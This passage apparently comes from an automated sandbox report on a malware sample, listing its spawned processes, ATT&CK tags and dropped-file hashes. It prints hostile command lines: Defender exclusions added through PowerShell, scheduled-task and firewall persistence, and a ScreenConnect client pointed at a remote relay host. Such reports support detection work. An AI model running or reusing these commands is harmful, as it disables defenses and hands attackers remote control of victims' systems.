                                                                                                                                                ping -n 10 localhost
                                                                                                                                                19⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:1420
                                                                                                                                              • C:\Windows\system32\dll32\msinfo32.exe
                                                                                                                                                "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                                                                                19⤵
                                                                                                                                                  PID:6032
                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                    "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                                                                                    20⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:532
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gubQos3ySnWn.bat" "
                                                                                                                                                    20⤵
                                                                                                                                                      PID:996
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Network.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Network.exe"
                                                                                                                      4⤵
                                                                                                                        PID:5008
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'
                                                                                                                          5⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:5664
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
                                                                                                                          5⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:5592
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'
                                                                                                                          5⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:5152
                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"
                                                                                                                          5⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:6360
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\rea.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\rea.exe"
                                                                                                                        4⤵
                                                                                                                          PID:4104
                                                                                                                          • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                                                                                            "c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                            5⤵
                                                                                                                              PID:2680
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"
                                                                                                                            4⤵
                                                                                                                              PID:5300
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                "schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpEF71.tmp"
                                                                                                                                5⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:5388
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                "schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF50F.tmp"
                                                                                                                                5⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:5824
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"
                                                                                                                              4⤵
                                                                                                                                PID:5672
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\mod.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\mod.exe"
                                                                                                                                4⤵
                                                                                                                                  PID:2620
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Server.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:5736
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                      5⤵
                                                                                                                                        PID:5600
                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                          6⤵
                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                          PID:5832
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:5472
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:6288
                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                                  8⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:6884
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6188
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:3032
                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                                          10⤵
                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                          PID:5772
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:944
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                                              11⤵
                                                                                                                                                                PID:6896
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                                                  12⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:6292
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                                                  12⤵
                                                                                                                                                                    PID:2396
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:5672
                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                                                          14⤵
                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                          PID:6820
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                                                          14⤵
                                                                                                                                                                            PID:6320
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                                                              15⤵
                                                                                                                                                                                PID:6684
                                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                                                                  16⤵
                                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                                  PID:6984
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                                                                  16⤵
                                                                                                                                                                                    PID:6592
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                                                                      17⤵
                                                                                                                                                                                        PID:1968
                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                                                                                                                                          18⤵
                                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                                          PID:5024
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                                                                                                                                          18⤵
                                                                                                                                                                                            PID:6396
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                                                                                                                                              19⤵
                                                                                                                                                                                                PID:6380
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\Client.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\Client.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4908
                                                                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                      "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:1472
                                                                                                                                                                    • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                                      "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:2392
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                          PID:4684
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xnAULEnVoqrp.bat" "
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5752
                                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                                              chcp 65001
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5840
                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                ping -n 10 localhost
                                                                                                                                                                                7⤵
                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                PID:5596
                                                                                                                                                                              • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                                                "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:6760
                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                    "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:6792
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9PZb2XeKo2Ov.bat" "
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:6940
                                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                                        chcp 65001
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:7064
                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                          ping -n 10 localhost
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                          PID:5220
                                                                                                                                                                                        • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                                                          "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:4860
                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                              "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                                              10⤵
                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                              PID:2396
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NHugTaed4e2t.bat" "
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:4584
                                                                                                                                                                                                • C:\Windows\system32\chcp.com
                                                                                                                                                                                                  chcp 65001
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:3720
                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                    ping -n 10 localhost
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                    PID:6932
                                                                                                                                                                                                  • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                                                                    "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:6168
                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                        PID:6444
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDT8T7iTruRo.bat" "
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                          PID:5544
                                                                                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                                                                                            chcp 65001
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                              PID:6740
                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                              ping -n 10 localhost
                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                              PID:6088
                                                                                                                                                                                                            • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                                                                              "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                PID:5560
                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                  "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:6376
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Xxys2Xb0KHAy.bat" "
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                    PID:3952
                                                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                      chcp 65001
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:6356
                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                        ping -n 10 localhost
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                        PID:3392
                                                                                                                                                                                                                      • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                                                                                        "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                          PID:5340
                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                            "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:7100
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y0xNmMCFk8yV.bat" "
                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                              PID:3328
                                                                                                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                chcp 65001
                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                  PID:2108
                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                  ping -n 10 localhost
                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                  PID:5404
                                                                                                                                                                                                                                • C:\Windows\system32\Windows Shell Interactive.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\Windows Shell Interactive.exe"
                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                    PID:6180
                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                      "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                      PID:6836
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HtYfsW3vai5h.bat" "
                                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                                        PID:1156
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\jij.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\jij.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:1912
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\333.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:2384
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:6136
                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:6736
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:5104
                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                        PID:6268
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\X54ekAcmKbIv.bat" "
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:6244
                                                                                                                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                            chcp 65001
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:3180
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:6660
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:4072
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:2936
                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                        PID:4572
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 1347DC49D48561C4A02CAEABAB78B4B1 C
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                          PID:4496
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC10E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240632515 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            PID:4480
                                                                                                                                                                                                                        • C:\Windows\system32\srtasks.exe
                                                                                                                                                                                                                          C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3244
                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 812A33CB12312E6462786B39941DA2A5
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:6064
                                                                                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 8849EAC97ADA90BEB9C92DE240009D0C E Global\MSI0000
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5124
                                                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:312
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4552 -ip 4552
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4152
                                                                                                                                                                                                                                • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                                                                                                                                                                                  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:456
                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4200
                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4232
                                                                                                                                                                                                                                      • C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=a205822a-25dd-4182-ae48-34f1f8dfcbcd&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5972
                                                                                                                                                                                                                                          • C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "791a6c20-0820-417e-b3aa-8d215157e49c" "User"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2980
                                                                                                                                                                                                                                            • C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "d3f4f0ef-3603-4e14-afcf-b85b775e7c43" "System"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:5604
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Network.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Network.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:6568

                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                              • C:\Config.Msi\e581d29.rbs

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                214KB

                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                5e1ec6d4a534348a2700f80a6bcf866b

                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                0b239720916a569ec7d5ceb2fd43cc12c689ec1a

                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                ebd2d4cd8556e6e9b3f906c5e21c64829f0795fa6e535fecdefa3345baba6888

                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                0582376917524e4f68ea4dc566a945ba672b89627aa0f606dc6e06ebe4dd161a7ebe87a77dc1d758cb3381e71a76ef6f9a80d96c11ff1722686f288361ad53ad

                                                                                                                                                                                                                                              • C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                761KB

